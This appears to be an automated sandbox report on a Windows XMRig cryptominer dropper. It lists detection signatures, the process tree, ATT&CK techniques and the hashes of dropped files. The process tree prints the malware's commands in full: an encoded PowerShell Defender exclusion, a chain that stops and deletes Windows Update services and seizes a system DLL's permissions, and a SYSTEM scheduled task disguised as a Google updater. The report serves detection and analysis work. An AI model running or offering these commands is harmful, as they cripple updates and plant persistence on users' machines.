Analysis

  • max time kernel
    317s
  • max time network
    298s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    03-07-2022 10:15

General

  • Target

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

  • Size

    7.5MB

  • MD5

    a29f3494661a52e3c66a2908389c5010

  • SHA1

    1645351e4b00a678ad7c4ac7784bf8d9c8703297

  • SHA256

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266

  • SHA512

    1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
    "C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Windows\Temp\lol.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1300
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1668
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1668 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1964
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Windows\Temp\run.bat" "
      2⤵
      • Drops startup file
      PID:1916
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:284
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1092
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:2036
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1568
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:1932
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:320
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:1084
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1984
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:2012
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1820
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:844
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1252
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2016
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1448
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1580
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1980
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:944
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:1092
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1336
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                6⤵
                  PID:1292
                • C:\Windows\system32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  6⤵
                    PID:744
                  • C:\Windows\system32\powercfg.exe
                    powercfg /x -standby-timeout-ac 0
                    6⤵
                      PID:1676
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                    5⤵
                      PID:1304
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                      5⤵
                        PID:1104
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                        5⤵
                          PID:1500
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                          5⤵
                            PID:948
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                            5⤵
                              PID:1292
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              5⤵
                                PID:1060
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              4⤵
                                PID:1860
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-ac 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1700
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-dc 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1256
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-ac 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1400
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-dc 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1584
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                                4⤵
                                  PID:1696
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                                    5⤵
                                    • Creates scheduled task(s)
                                    PID:744
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                  4⤵
                                    PID:1400
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                      5⤵
                                        PID:680
                              • C:\Windows\system32\taskeng.exe
                                taskeng.exe {70914561-3A91-4F46-8EED-995A916BF00E} S-1-5-18:NT AUTHORITY\System:Service:
                                1⤵
                                • Loads dropped DLL
                                PID:1728
                                • C:\Program Files\Chrome\updater.exe
                                  "C:\Program Files\Chrome\updater.exe"
                                  2⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:1060
                                  • C:\Windows\System32\conhost.exe
                                    "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                                    3⤵
                                    • Drops file in Drivers directory
                                    • Suspicious use of SetThreadContext
                                    • Drops file in Program Files directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:892
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                      4⤵
                                        PID:1536
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                          5⤵
                                            PID:1292
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                          4⤵
                                            PID:1092
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            4⤵
                                              PID:872
                                              • C:\Windows\system32\reg.exe
                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                5⤵
                                                • Modifies registry key
                                                PID:2032
                                              • C:\Windows\system32\reg.exe
                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                5⤵
                                                • Modifies registry key
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:744
                                              • C:\Windows\system32\reg.exe
                                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                5⤵
                                                • Modifies registry key
                                                PID:1948
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                5⤵
                                                  PID:1136
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                  5⤵
                                                    PID:1580
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                    5⤵
                                                    • Modifies registry key
                                                    PID:1504
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                    5⤵
                                                      PID:1632
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                      5⤵
                                                        PID:568
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                        5⤵
                                                          PID:1512
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                          5⤵
                                                            PID:1440
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                            5⤵
                                                              PID:2032
                                                          • C:\Windows\System32\conhost.exe
                                                            C:\Windows\System32\conhost.exe
                                                            4⤵
                                                              PID:1136
                                                              • C:\Windows\System32\conhost.exe
                                                                "C:\Windows\System32\conhost.exe" "adjdyakvdkolri"
                                                                5⤵
                                                                  PID:608
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe zhcixymdmjms1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1512
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop bits
                                                          1⤵
                                                          • Launches sc.exe
                                                          PID:1724
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop wuauserv
                                                          1⤵
                                                          • Launches sc.exe
                                                          PID:1580
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                          1⤵
                                                          • Modifies registry key
                                                          PID:1696
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop dosvc
                                                          1⤵
                                                          • Launches sc.exe
                                                          PID:1084
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                          1⤵
                                                          • Modifies registry key
                                                          PID:1616
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                          1⤵
                                                          • Modifies registry key
                                                          PID:608
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                          1⤵
                                                          • Modifies registry key
                                                          PID:1724
                                                        • C:\Windows\system32\icacls.exe
                                                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                          1⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:1084
                                                        • C:\Windows\system32\takeown.exe
                                                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                          1⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1676
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                          1⤵
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          • Modifies registry key
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1292
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop WaaSMedicSvc
                                                          1⤵
                                                          • Launches sc.exe
                                                          PID:1984
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop UsoSvc
                                                          1⤵
                                                          • Launches sc.exe
                                                          PID:932

                                                        Network

                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                        Execution

                                                        Scheduled Task

                                                        1
                                                        T1053

                                                        Persistence

                                                        Modify Existing Service

                                                        2
                                                        T1031

                                                        Scheduled Task

                                                        1
                                                        T1053

                                                        Privilege Escalation

                                                        Scheduled Task

                                                        1
                                                        T1053

                                                        Defense Evasion

                                                        Modify Registry

                                                        3
                                                        T1112

                                                        Virtualization/Sandbox Evasion

                                                        1
                                                        T1497

                                                        Impair Defenses

                                                        1
                                                        T1562

                                                        File Permissions Modification

                                                        1
                                                        T1222

                                                        Discovery

                                                        Query Registry

                                                        2
                                                        T1012

                                                        Virtualization/Sandbox Evasion

                                                        1
                                                        T1497

                                                        System Information Discovery

                                                        3
                                                        T1082

                                                        Impact

                                                        Service Stop

                                                        1
                                                        T1489

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Program Files\Chrome\updater.exe
                                                          Filesize

                                                          7.3MB

                                                          MD5

                                                          0c9bed327840bbe964e85913d5868fcb

                                                          SHA1

                                                          ef0b874b57be491ae87ed0237a025d5580265218

                                                          SHA256

                                                          3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                          SHA512

                                                          12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                        • C:\Program Files\Chrome\updater.exe
                                                          Filesize

                                                          7.3MB

                                                          MD5

                                                          0c9bed327840bbe964e85913d5868fcb

                                                          SHA1

                                                          ef0b874b57be491ae87ed0237a025d5580265218

                                                          SHA256

                                                          3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                          SHA512

                                                          12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                          Filesize

                                                          60KB

                                                          MD5

                                                          589c442fc7a0c70dca927115a700d41e

                                                          SHA1

                                                          66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                          SHA256

                                                          2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                          SHA512

                                                          1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          1KB

                                                          MD5

                                                          a266bb7dcc38a562631361bbf61dd11b

                                                          SHA1

                                                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                          SHA256

                                                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                          SHA512

                                                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          1KB

                                                          MD5

                                                          a266bb7dcc38a562631361bbf61dd11b

                                                          SHA1

                                                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                          SHA256

                                                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                          SHA512

                                                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          1KB

                                                          MD5

                                                          a266bb7dcc38a562631361bbf61dd11b

                                                          SHA1

                                                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                          SHA256

                                                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                          SHA512

                                                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          1KB

                                                          MD5

                                                          a266bb7dcc38a562631361bbf61dd11b

                                                          SHA1

                                                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                          SHA256

